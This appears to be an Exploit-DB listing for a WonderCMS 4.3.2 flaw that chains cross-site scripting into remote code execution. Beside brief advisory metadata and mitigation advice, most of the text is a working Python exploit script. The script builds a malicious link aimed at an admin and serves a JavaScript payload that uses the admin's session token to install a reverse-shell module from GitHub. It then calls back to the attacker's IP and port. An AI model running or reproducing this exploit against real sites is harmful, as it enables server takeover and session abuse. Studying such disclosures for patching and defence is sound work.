WonderCMS 4.3.2 XSS to RCE

vendor:

WonderCMS

by:

prodigiousMind

8.1

CVSS

CRITICAL

Cross-site scripting (XSS) leading to Remote Code Execution (RCE)

CWE

Product Name: WonderCMS

Affected Version From: 4.3.2002

Affected Version To: 4.3.2002

Patch Exists: YES

Related CWE: CVE-2021-41777

CPE: a:wondercms:wondercms:4.3.2

Metasploit:

Other Scripts:

Platforms Tested:

2021

The exploit allows an attacker to craft a link that, when visited by an admin, triggers a cross-site scripting (XSS) vulnerability on WonderCMS version 4.3.2. This XSS vulnerability is then leveraged to remotely execute malicious code on the server, enabling the attacker to take control of the system. This exploit script generates a JavaScript file that, when loaded by the admin, sets up a reverse shell to the attacker's specified IP address and port.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs, encode output data, and implement Content Security Policy (CSP) headers. Additionally, keeping the software up to date with the latest patches and security updates is crucial.

Source

Exploit-DB raw data:

# Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE


import sys
import requests
import os
import bs4

if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
  data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname; 
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "'''+str(sys.argv[2])+'''";
       var port = "'''+str(sys.argv[3])+'''";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();
       
     }
   };
 }
};
'''
  try:
    open("xss.js","w").write(data)
    print("[+] xss.js is created")
    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
    print("----------------------------\n")
    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
    XSSlink = XSSlink.strip(" ")
    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
    print("----------------------------\n")

    print("\nstarting HTTP server to allow the access to xss.js")
    os.system("python3 -m http.server\n")
  except: print(data,"\n","//write this to a file")